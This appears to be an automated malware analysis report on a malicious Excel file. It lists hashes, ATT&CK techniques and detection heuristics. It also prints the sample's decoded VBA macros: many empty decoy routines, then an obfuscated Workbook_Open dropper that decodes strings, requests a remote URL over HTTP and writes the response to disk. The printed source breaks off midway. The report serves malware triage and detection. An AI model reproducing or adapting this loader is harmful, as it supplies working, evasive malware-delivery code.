Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ebeada6216076673…

MALICIOUS

Office (OLE)

213.5 KB Created: 1996-10-08 23:32:33 Authoring application: Microsoft Excel First seen: 2015-03-15
MD5: 944bf47ae650513abf5b75ccaece550e SHA-1: e1386b8839a7be52046fd1845243432ab64cbd00 SHA-256: ebeada62160766732aeb70aa7dd5507c595b41bc93b40fb87059747c409e8eb0
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The critical heuristics indicate that the VBA macros within this Excel file are obfuscated and designed to download and execute a file from the internet. The Workbook_Open macro is automatically executed upon opening the document, initiating the malicious process. The ClamAV detection further confirms its malicious nature as a dropper.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-1822094 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1822094
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    .Write sC_S65IyAP_.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set YZXRv0LAG = CreateObject(fsOY4M0AW(ekCJo8Ot))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set YZXRv0LAG = CreateObject(fsOY4M0AW(ekCJo8Ot))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32757 bytes
SHA-256: 5b217dd2f4e1590d94c8e6a548b1abb1dddb654210ff8b5a60051e99f6a305a7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
360 of 571 identifiers look randomly generated (e.g. 'ovZmlBFIZohQyAVyCbvJwjJgfHoG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
AM6Ak5ZWT
End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Sub RJiLqaVKfVMak()


End Sub
Private Sub sTqCQyPBFgT()

End Sub
Private Sub OmHgm DUbtQwIEdbCx()

End Sub
Private Sub dwqgLUUTZJCJ()

End Sub
Private Function gAuiMy()

End Function
Public Function QoXvuj6OR()

End Function
Private Sub PifCYwplwNcxlvS()

End Sub
Public Function PelCKb()

End Function
Public Function btZMnI0O()

End Function
Private Sub vsboNN()

End Sub
Public Sub mFlJbBbnhyiE()

End Sub
Public Sub BMetABLjeHJ()

End Sub
Private Function Zegm()

End Function
Public Function AcAh1AtVqmp()

End Function
Public Sub IrreeFNbCQ()

End Sub
Private Sub DspjByUE()

End Sub
Private Sub duvQSczgJaGMgo()

End Sub
Private Function o5UlfhKg()

End Function
Private Function iHo()

End Function
Private Function EYUYCnA()

End Function
Public Function DUbtQwIEdb()

End Function
Private Function D1Nrv()

End Function
Private Sub UTZJCJoBAQTQOn()

End Sub
Private Sub NPkMQf()

End Sub
Public Sub KxZvtVDUGKlKVPi()

End Sub

Attribute VB_Name = "Module2"

Public Sub CHVgA()

End Sub
Private Sub OlkLtKxB()

End Sub
Public Function XUyuky1Awcj()

End Function
Private Sub hjPkpxmRbca()

End Sub
Public Sub QuHGQbeUuJBm()

End Sub
Private Function Xim5m4ALOs()

End Function
Private Sub dQpYvf NAbv7?N2?lqs()

End Sub
Private Sub xzgmFNDjeediSa()

End Sub
Private Sub Yn arQmwQkZtkbo()

End Sub
Private Function qG2A()

End Function
Private Function lDaH5AB2O()

End Function
Private Function tvaMYsmb()

End Function
Public Function jc gpWudQuwo()

End Function
Public Sub FApJArEPyxlQyUh()

End Sub
Private Function uHaV()

End Function
Public Function CTq4OR0AncbR()

End Function
Private Sub nQgzSmhVB()

End Sub
Public Sub OzsAerqGKMEe()

End Sub
Private Function couprUq0Yv()

End Function
Private Sub BbBMGZVsO()

End Sub
Public Function nDSoc()

End Function
Private Function hjPkpxmRbca Lki4?4M0A()

End Function
Public Sub UuJBmySvzNJsGg()

End Sub

Attribute VB_Name = "Module3"
Public Function PlyBtgIdZ()


End Function
Public Sub kvpHqMwHNJUm()

End Sub
Public Sub TrmPRxEYfUAv()

End Sub
Public Function tTQF()

End Function
Private Sub UCrLBsGQzzmmNVj()

End Sub
Public Sub izLAxrJGeNYe()

End Sub
Private Sub DZbkHoRiOUo()

End Sub
Public Function JmYk()

End Function
Private Sub QSHcRIQ()

End Sub
Private Sub CpQnzNvMyCcQN()

End Sub
Private Function H4OQ()

End Function
Private Sub yoTddchRKRw()

End Sub
Private Sub cfQvKDnVYsUZnxS()

End Sub
Private Sub hDBeLdOStSe()

End Sub
Public Function UCMIhSGFyy()

End Function
Private Function  T4?Zh()

End Function
Private Sub TbiMaZpsvn()

End Sub
Private Sub DmoIlqDAjwVVxF()

End Sub
Private Sub tRjJkvpHqMwHN()

End Sub
Private Function UfwdQ7OIHvL()

End Function
Public Sub YfUAvwuzlry()

End Sub
Public Sub FvypOrQU()

End Sub
Public Sub BsGQzzmmNVjKf()

End Sub

Attribute VB_Name = "Module4"

Public Function hZvXd4aE()

End Function
Public Sub GEJuBIZzzOE()

End Sub
Public Function Yjo()

End Function
Private Sub oTrJVJHBTQnQin()

End Sub
Public Sub NjktRycrYexFv()

End Sub
Public Sub UaKDKpQBRVYPpRw()

End Sub
Public Sub lcShraZMyawIQE()

End Sub
Private Sub maYRkhDayEALO()

End Sub
Private Sub KTOsHbuNIx()

End Sub
Private Sub lqbUcFS()

End Sub
Public Sub ogFUMxf()

End Sub
Private Function hUE()

End Function
Private Function MQtf7O()

End Function
Private Function AyVTtsjjo()

End Function
Private Sub OuCDBGelsVjiyCF()

End Sub
Public Sub eNvySvz()

End Sub
Private Function tn7aBKqP()

End Function
Public Sub tEyQAQGQQSfwKS()

End Sub
Public Sub vZbHNhpfKF()

End Sub
Private Sub uBIZzzOEHzZB()

End Sub
Private Sub AULCPbJIwwYgs()

End Sub
Public Sub rJVJHBTQnQinkv()

End Sub
Public Sub ktRycr()

End Sub
Private Sub FvbVQUaKDK()

End Sub
Private Function kwhdgKyIbW()

End Function
Public Function jCZrQ0I5a()

End Function
Public Function LO1E()

End Function
Public Function DWRFhS2ara()

End Function

Attribute VB_Name = "Module5"
Public Function XHy8Iviu2a()


End Function
Public Function LnKU()

End Function
Public Function DFgCwB5Oqsq()

End Function
Private Function XDMtS()

End Function
Private Sub irPJnpVqv()

End Sub
Private Function iih buTNehkcA()

End Function
Public Sub adxaespYl()

End Sub
Public Sub uGjCiGY()

End Sub
Private Function vm0LeZbpak()

End Function
Public Function TCoYNMC0OsN()

End Function
Private Function TCHq5U6aULah()

End Function
Private Function  N7?ubAiI()

End Function
Private Sub emzbuayPcQN()

End Sub
Private Function EORu5Upiu()

End Function
Private Sub MBhddbgRKRw()

End Sub
Private Function mycB()

End Function
Private Sub hCPeLdOSshe()

End Sub
Public Sub KgEKGSV()

End Sub
Private Function ER6I()

End Function

Attribute VB_Name = "Module6"

Public Function Rh7YK()

End Function
Private Sub zSbPvrrqu()

End Sub
Private Function LjSrpQP()

End Function
Public Function fQ5Y()

End Function
Private Function qsIrDI0aHqf()

End Function
Private Sub mEBZISZUh()

End Sub
Public Function jNMbhwGY()

End Function
Public Sub pwbBnDGJB()

End Sub
Private Function  KPK2?ENtSBaDmmaLnJVk()

End Function
Private Sub ZznlfwuQmKQMZcq()

End Sub
Private Function VVbqiAHn()

End Function
Private Sub gfvyBtShaKsuOr()

End Sub
Public Sub pCqcDaZAizlpPq()

End Sub
Private Function GYEE()

End Function
Public Function wdQ7Aondd()

End Function
Public Function BHCEgDNfL()

End Function
Public Sub sTdpQlPoG()

End Sub
Private Sub LeMkTekgsIYfhq()

End Sub
Private Function RPpoesjAr()

End Function
Private Function lOkyAtgI()

End Function
Private Sub iZOdnVVIJktFi()

End Sub
Private Function FEttl()

End Function
Public Function XSU()

End Function
Public Function wUCM1E7UGF()

End Function
Public Sub BfJtp()

End Sub
Private Sub gtDmmaLn()

End Sub

Attribute VB_Name = "Module7"

Public Sub oIlpDNj()

End Sub
Public Function WkbqwOWnLr()

End Function
Public Function  l4?I8E()

End Function
Private Sub AJJINkrydqpFILD()

End Sub
Public Sub TCEZBGT()

End Sub
Public Sub mmNVjKeJizazK()

End Sub
Public Function llqsKMoLVo()

End Function
Public Sub hNUnvl()

End Sub
Private Sub KPAHOfGFVLOFf()

End Sub
Private Function AZXwv()

End Function
Public Sub CemzbuayPcQ()

End Sub
Public Function  t3?I()

End Function
Public Function rtWsEJCoQk()

End Function
Public Sub GzGlLxNQTLkNscY()

End Sub
Public Sub NcmUUIuVsESARDH()

End Sub
Public Sub MfczUtzvHKZuwF()

End Sub
Private Sub DVqJDtZi()

End Sub
Private Sub QPQBONe()

End Sub
Public Function acFbmqjX()

End Function
Public Sub fsCYl()

End Sub
Public Sub IHjQiTY()

End Sub
Private Function nON0ahtOIK()

End Function
Private Function VeLjSroQP()

End Function

Attribute VB_Name = "Module8"

Public Function es6OpjlO6Am()

End Function
Public Sub gzfCUuUgasc()

End Sub
Public Function Pc3ImhVgDk()

End Function
Private Function J6aq4OR3A()

End Function
Private Sub bbrhjbAdHF()

End Sub
Private Function AKN7IWleu()

End Function
Public Function UEBTfFDrq()

End Function
Private Sub JOLQopKLUt()

End Sub
Public Function ZLXqlZCmjC()

End Function
Public Sub xzrQtYIEs()

End Sub
Public Function MPHsF()

End Function
Public Sub enq3UgcnqF()

End Sub
Public Function u2AkHRkP0aT()

End Function
Public Sub NOMRCwDhutJ()

End Sub
Public Function oEyNUB1AFwk()

End Function
Private Function UJIwwpFL()

End Function
Private Function YBXimf()

End Function
Public Sub SGPniLNuOT()

End Sub
Public Function ljKJs()

End Function
Public Function FG2A()

End Function
Public Sub jKSfHbG()

End Sub

Attribute VB_Name = "Module9"

Private Sub CeydBTfT()

End Sub
Private Sub axhrx()

End Sub
Public Sub QsuDbHlBioHPEkg()

End Sub
Public Sub UNUzaLc()

End Sub
Private Function  vF4?DIB()

End Function
Private Function QXEGShOgRV()

End Function
Private Function eZNp()

End Function
Private Sub X0CtSrwwvAlelPdc()

End Sub
Private Sub qOeQGprLot()

End Sub
Private Sub znZAQVx()

End Sub
Private Sub mMmxrJ()

End Sub
Public Function ucAi1OF()

End Function
Private Sub AUaiYDMNLQouBg()

End Sub
Public Function  fVVbqiA1?()

End Function
Private Function  y5?EERmv0?k()

End Function
Private Sub MeEfqkCl()

End Sub
Private Sub IEPh Rh7YKK()

End Sub

Attribute VB_Name = "Module10"
Private Sub BEwUydbIxRIzM()


End Sub
Public Function  q8?SPh2UA()

End Function
Public Function vsy7E3Oql()

End Function
Public Sub NvZoUbuC()

End Sub
Public Sub TRQHAHmMyORUMl()

End Sub
Private Function QmwQyiKea()

End Function
Public Function PcU6YUWg()

End Function
Public Sub VvAxILbwxG()

End Sub
Public Function fkdQrN()

End Function
Public Function neeVkrIQh()

End Function
Public Function OTM()

End Function
Private Sub gtEZm()

End Sub
Private Sub JIkRjUa()

End Sub
Public Sub fxuQnLD()

End Sub
Public Sub rMAJh()

End Sub
Private Sub oHNVKqzAyDbh()

End Sub
Private Function SPqpffkmsJ()

End Function
Private Sub suPrwKGpDcdD()

End Sub
Public Function Bl8OLt3Id4Ng()

End Function
Private Sub TPcsHOQaxsVYE()

End Sub
Private Sub bHCCBGr()

End Sub

Attribute VB_Name = "Module11"

Public Sub kHoRi()

End Sub
Private Sub wlQMMLPB()

End Sub
Public Function BH0UiOXE()

End Function
Public Sub QSHcRIQPPCpQn()

End Sub
Public Function LwZu7aM()

End Function
Private Sub uqCFTprA()

End Sub
Private Sub yQlEyo()

End Sub
Private Sub chRKR()

End Sub
Private Function J4IZpwP()

End Function
Private Function yBtgIdYc()

End Function
Private Sub SeYqnKgEx()

End Sub
Private Function kFtD T4?Zh()

End Function
Public Sub wCJoBAQTQOoCvgN()

End Sub
Private Function iTeicP()

End Function
Public Function cUjbG()

End Function
Private Sub wNdkmvS()

End Sub
Public Sub agzHwcYYV()

End Sub
Public Sub arRQhQaRqTyweS()

End Sub
Public Function RCM()

End Function
Private Sub SliFp TVwU5AbKLj()

End Sub
Private Function ucQAon()

End Function
Private Sub TknqiG()

End Sub
Public Sub ujDtkyIrre()

End Sub
Public Sub bpQoaeEspjByV()

End Sub
Private Function WIUniWAjgK()

End Function
Private Function fsOXa1U6A()

End Function
Private Function sJQ()

End Function
Private Function S2OLtTQFE()

End Function

Attribute VB_Name = "Module12"

Public Function qsHrDH0IHqe()

End Function
Public Sub rtNqvIFoBbbC()

End Sub
Private Sub TyQoOpAuMv()

End Sub
Private Sub SOarGNPZwrUQD()

End Sub
Public Sub aFBBAEq()

End Sub
Public Sub vuKADvTxcaHwQG()

End Sub
Public Sub EErrScoPkOnFQFC()

End Sub
Public Sub jSdjfrHIegpMu()

End Sub
Private Sub atBqVRRQVGzGlL()

End Sub
Public Function iNLahwGX()

End Function
Private Sub VsESARDHi()

End Sub
Public Sub fczUtzvHKZuwF()

End Sub
Private Function XpVViEO()

End Function
Public Sub hkcAP()

End Sub
Private Function VVapiuYI()

End Function
Public Sub AmNkjKsJvzaAL()

End Sub

Attribute VB_Name = "Module13"
Private Const WOlM3al = "Ј№™›�№Сљ‡љ"
Private Const Jfp1OUtrS = "¬—љ““СѕЏЏ“–њћ‹–ђ‘"
Private Const FsToknf = "ѕ»°»ЅС¬‹Ќљћ’"
Private Const bPO7ajuP = "¬њЌ–Џ‹–‘�С№–“љ¬†Њ‹љ’°ќ•љњ‹"
Private Const bPrcZrXY = "ёє«"
Private Const eBSZrP = "І¬§ІіНС§Іі·««Ї"
Private Const UHVpAD6O = WOlM3al
Private Const lLJ = "—‹‹ЏЕРР—Љ’’љ“ТНЖС›љР•ЊРќ–‘Сљ‡љ"
Private Const ekCJo8Ot = bPO7ajuP

Sub AM6Ak5ZWT()
Dim YZXRv0LAG, gmkGo6q
GoTo JuovZmlBFIzZohQyAV
Dim QbvJwjJgf As Integer
For QbvJwjJgf = 0 To 0
If QbvJwjJgf = 5 Then End
Next QbvJwjJgf
Dim ZbSsUz As Integer
For ZbSsUz = 0 To 0
If ZbSsUz = 5 Then End
Next ZbSsUz
Dim DAQtRY As Integer
For DAQtRY = 0 To 0
If DAQtRY = 5 Then End
Next DAQtRY
JuovZmlBFIzZohQyAV:
Set YZXRv0LAG = CreateObject(fsOY4M0AW(ekCJo8Ot))
GoTo ExhORmOShdMazzbj
Dim rQuMmMYRkTqa As Integer
For rQuMmMYRkTqa = 0 To 0
If rQuMmMYRkTqa = 5 Then End
Next rQuMmMYRkTqa
Dim pcgFtrlDAQtR As Integer
For pcgFtrlDAQtR = 0 To 0
If pcgFtrlDAQtR = 5 Then End
Next pcgFtrlDAQtR
Dim OShdMa As Integer
For OShdMa = 0 To 0
If OShdMa = 5 Then End
Next OShdMa
ExhORmOShdMazzbj:
Dim ijnK2g, j_YLrCc1S, fz21trwt
Const rihuZ61esFi = 2
GoTo crYpcgFtrlDAQtRYTfi
Dim TeniLbuOhcQ As Integer
For TeniLbuOhcQ = 0 To 0
If TeniLbuOhcQ = 5 Then End
Next TeniLbuOhcQ
Dim zLoHnKd As Integer
For zLoHnKd = 0 To 0
If zLoHnKd = 5 Then End
Next zLoHnKd
Dim wjJgfHoGsw As Integer
For wjJgfHoGsw = 0 To 0
If wjJgfHoGsw = 5 Then End
Next wjJgfHoGsw
crYpcgFtrlDAQtRYTfi:
Set ijnK2g = YZXRv0LAG.GetSpecialFolder(rihuZ61esFi)
GoTo YTfixSTeniLbuOhcQxFG
Dim uovZmlBFIz As Integer
For uovZmlBFIz = 0 To 0
If uovZmlBFIz = 5 Then End
Next uovZmlBFIz
Dim aYdNUcsSSiZb As Integer
For aYdNUcsSSiZb = 0 To 0
If aYdNUcsSSiZb = 5 Then End
Next aYdNUcsSSiZb
Dim ovZmlBFIZohQyAVyCbvJwjJgfHoG As Integer
For ovZmlBFIZohQyAVyCbvJwjJgfHoG = 0 To 0
If ovZmlBFIZohQyAVyCbvJwjJgfHoG = 5 Then End
Next ovZmlBFIZohQyAVyCbvJwjJgfHoG
YTfixSTeniLbuOhcQxFG:
dfggg = fsOY4M0AW(lLJ)
GoTo vKrxQZOupqoteQfIkUlp
Dim IlPAwkvmAKtsgSt As Integer
For IlPAwkvmAKtsgSt = 0 To 0
If IlPAwkvmAKtsgSt = 5 Then End
Next IlPAwkvmAKtsgSt
Dim csSSiZbSsUzx As Integer
For csSSiZbSsUzx = 0 To 0
If csSSiZbSsUzx = 5 Then End
Next csSSiZbSsUzx
Dim GswVwHBQnJiaViyNjQg As Integer
For GswVwHBQnJiaViyNjQg = 0 To 0
If GswVwHBQnJiaViyNjQg = 5 Then End
Next GswVwHBQnJiaViyNjQg
vKrxQZOupqoteQfIkUlp:
FgKJHofd = ijnK2g & fsOY4M0AW(UHVpAD6O)
GoTo trlDAQtRYTfixSTeni
Dim uOhcQFGEJuovZ As Integer
For uOhcQFGEJuovZ = 0 To 0
If uOhcQFGEJuovZ = 5 Then End
Next uOhcQFGEJuovZ
Dim hCDMl As Integer
For hCDMl = 0 To 0
If hCDMl = 5 Then End
Next hCDMl
Dim QnCYLUsnQS As Integer
For QnCYLUsnQS = 0 To 0
If QnCYLUsnQS = 5 Then End
Next QnCYLUsnQS
trlDAQtRYTfixSTeni:
Set sC_S65IyAP_ = CreateObject(fsOY4M0AW(eBSZrP))
sC_S65IyAP_.Open fsOY4M0AW(bPrcZrXY), dfggg, False
sC_S65IyAP_.send
Set hxuWnpbqBtp4u = CreateObject(fsOY4M0AW(ekCJo8Ot))
GoTo zgmFNDjefdiSLSxY
Dim dgYxa As Integer
For dgYxa = 0 To 0
If dgYxa = 5 Then End
Next dgYxa
Dim AerqGKM As Integer
For AerqGKM = 0 To 0
If AerqGKM = 5 Then End
…

Open this report in the interactive analyzer, or submit your own file for analysis.